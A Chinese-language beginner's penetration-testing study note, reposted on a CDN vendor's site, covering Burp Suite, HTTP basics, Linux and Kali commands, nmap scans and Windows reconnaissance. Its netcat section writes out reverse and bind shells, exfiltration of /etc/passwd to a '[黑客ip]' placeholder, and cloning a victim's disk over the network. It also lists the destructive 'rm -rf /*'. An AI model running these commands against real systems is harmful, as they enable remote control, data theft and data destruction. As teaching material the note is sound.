网络安全入门day1

导语:day1主要是一些基本渗透工具的使用方法和一些Linux和kali基础指令哈,如果有错误,希望大佬指点修正,后面会慢慢更新进阶版的其他内容的。

一.基本工具burp suite和php基本知识(小入门)

1.用burp suite访问http可以,访问https需要证书
访问http://burp/
下载证书,工具-选项-高级-证书-查看证书-证书机构-导入

2.网络传输二进制变成hex(16进制)–>人类可读

3.基本php语言:
<?php

echo 'haha';

?>

$a=123; 定义变量
//单行注释
/*
多行注释
*/

4.get和post请求
get:用于取东西
$a=$_GET['name'];
$b=$_GET['age'];

if($b>18)
{
echo 'chengnian'.$a;
}else{
echo 'weichengnian'.$a;
}

post:(用于用户名登录注册)
用post data 输入,burp抓包时就是post请求

get刷新和跳转没有区别,post按回车键会以get的方式读取当前地址,刷新会再次提交数据到当前页面

5.request:向服务器发送请求,服务器给一个结果给客户端
forward:内部重定向(发生跳转)
redirect:服务器收到后发一个状态给客户,客户再次请求,url发生改变
url:统一资源定位器
http://www.baidu.com/index.php
协议 域名 文件

s=文件
?=get请求
ie=参数名
utf-8参数值
&连接符

6.常用的http状态码
200 成功
301 转向了其他url
404 页面资源不存在
500 服务器内部错误

content-type:文件类型
content-length:内容长度

二.操系统和公网服务器的部署作

1.Linux—android系统
(开源)
Windows(常用)
(闭源)
macOS–iOS(苹果操作系统很安全)
(闭源)

闭源:黑盒测试
开源:白盒测试(代码审计)

vps虚拟服务器
vultr.com —-租一个vps,部署可以协议,然后。。。。

租好了可以分配一个ip,连接这台服务器,
Windows 远程桌面连接(用户名administrator)
Linux ssh连接(用户名一般root)

一般用bitvise连接好用

2.Linux小知识

ipconfig 查看ip地址
whoami 查看自己是什么用户

安装一个网站管理系统(宝塔面板)

一些线路:
CN2中国下一代承载网,支持qos,比传统的163线路强
CN2GT便宜,拥堵
CN2GIA贵,质量好

BGP多线机房,自动识别运营商,不同网络自动切换

GCP谷歌公司的线路,贵,质量超级好

AWS亚马逊线路,流量太少

Azure微软线路,慢,中规中矩

PCCW香港线路,贵,网络发达

IPLC国际私有租用线路(专线),极贵,带宽小流量低,直接墙外,不会通过GFW审查

三.踪迹隐藏和加密通信

1.www.cloudflare.com免费的cdn

CDN作用:防止ip被别人发现,流量缓存
如果用户对本尊发起攻击,需要穿过多个cloud flare才能找到

个人信息泄露:

泄露公网ip,就会暴露通信内容
加密的方法(VPN:虚拟专用网络,通常用于企业之间通信)

个人软件:

qq;wx等
各种杀毒软件和国产浏览器会上传数据

个人电脑:
盗版的操作系统
邮件客户端

2.最牛的加密:

pgp加密

公钥public key 加密,私钥private key 解密
公钥可以传播,私钥不能泄密

若pc2想发一条pc1只能看的内容,pc2要导入pc1的公钥
如果要pc1和pc2双向通信,必须两边都拥有对方的公钥
私钥才能解密,所以很重要!!!!!

efs文件加密:只能用于Windows

证书加密:文件夹加密后,加入文件同样会被加密,如果删除证书并且注销后,文件再也打不开,一定要注销!

四.渗透测试系统了解(kali)

1.入侵类操作系统:kali(linux系统)

2020版 kali用户名密码kali
2019版及以下 root toor

2.基本指令及详细介绍:

$ 普通用户权限
sudo su 提权命令

# root权限(机器&人类可用最高权限)

ifconfig 查看ip地址

whoami 查看自己是谁

pwd 查看当前所在目录

cd .. 退一格
(在linux的世界里/是最上层目录)

ls 查看当前目录

ls -la 查看详细信息

d r-x r-x r-x 13 root root 0 Nov 3 11:22 sys
A B C D E F

d 文件夹
– 文件
l 链接

r=read=4 w=write=2 x=execute=1

A=所有者权限

B=所有者所在组权限

C=其他人权限

D=所有人

E=所有人所在的组

F=文件名

rwx r-x r-x
755
r可读–4
w可写–2
x可执行–1

mkdir test 新建文件夹,名字叫test

touch 1.txt 新建文件1.txt

vi 1.txt 使用vi编辑东西

vi是一个命令行编辑器
按下i进入insert模式
esc—:wq 保存退出 :q! 不保存退出

cat 1.txt 看一下1.txt内容
tac

cp [被复制的人] [复制的位置] 复制

mv [被剪切的人] [目标位置] 剪切/改名

rm [目标] 删除

rm -rf [目标] 全部删除
(rm -rf /* 危险命令)

find [要在哪个地方查找] -name [查找的文件名] 找东西

ps 查看进程
ps -ef 查看所有进程

top 看进程

ctrl+c 结束

ps -ef | grep [条件] 筛选符合条件的进程
ps -ef | grep bash 在所有进程里面查看名字叫bash的

| = 叫管道符,把左边命令执行的结果给右边

echo 回显

uname 查看操作系统
uname -a 查看详细信息

chmod [权限数字] [目标文件] 修改权限
chmod 755 -R [文件夹] 修改文件夹内所有东西的权限

防火墙
service iptables start/stop
永久关闭
chkconfig iptables on/off

passwd 修改密码

3.nc监听

服务端:
nc -l -p 4444

客户端:
nc -nv [服务端ip] 4444

1.正向控制:
目标:
nc -lp 3333 -e cmd

黑客:
nc -nv [目标Ip] 3333

2. 反向控制:
黑客:
nc -lp 3333

目标:
nc -nv [黑客ip] 3333 -e cmd

4.nmap扫描器的介绍

nmap [目标ip] 普通扫描

-sT tcp扫描,普通扫描

-sS 隐秘扫描(不形成三次握手),不建立tcp连接,所以不会在防火墙上留下痕迹

-sL [考虑扫一个段] list scan列表扫描,主要用于主机发现

-sn ping scan(ping扫描)只发现主机不扫描端口

-Pn 将所有主机都假定为开机,跳过主机发现过程

-P0 使用ip协议探测主机是否开启

-sU 使用udp扫描

-p [指定扫描哪些端口]

-O 识别操作系统

五.信息搜集工具

1.信息搜集

本地信息搜集:

whoami 查看自己的身份
whoami /all 获取当前域的信息
ipconfig /all 详细的ip信息

arp -a 查看arp表
systeminfo 查看操作系统信息
echo %PROCESSOR_ARCHITECTURE% 查看 cpu型号
wmic product get name,version 查看安装软件和版本信息
wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁列表
net user 查看本地用户

net session 显示本地和远程的会话

wmic process list brief 查看进程

net view 查看内网的共享

远程文件信息搜集:

http://seo.chinaz.com/

http://whois.chinaz.com/

2.活跃主机识别

nmap -sP [网段]

nping -tcp -p 445 -data [十六进制数据] [目标ip]
(对目标的445端口,以tcp协议发送一段十六进制的数据)

nmap -sV [目标ip] 服务指纹识别

amap -bq [目标ip] [端口] 服务枚举

nc -nvz [ip] 1-65535 使用nc进行扫描

3.kali加密传输
目标:
cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

黑客:
nc -l -p 3333 > kali.txt

4.传输文件
目标:
nc -nv [黑客ip] 3333 < [要传的文件] -q 1

黑客:
nc -lp 3333 > xx.txt

5. 远程克隆linux硬盘:

黑客:
nc -lp 3333 | dd of=/dev/sda

目标:
dd if=/dev/sda | nc -nv [黑客ip] 3333 -q 1

原文链接:https://blog.csdn.net/m0_59082970/article/details/123549449?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165918469516782425173733%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165918469516782425173733&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-21-123549449-null-null.nonecase&utm_term=%E9%A6%99%E6%B8%AFcdn

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/2933

(0)
上一篇 2022年7月30日
下一篇 2022年7月30日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml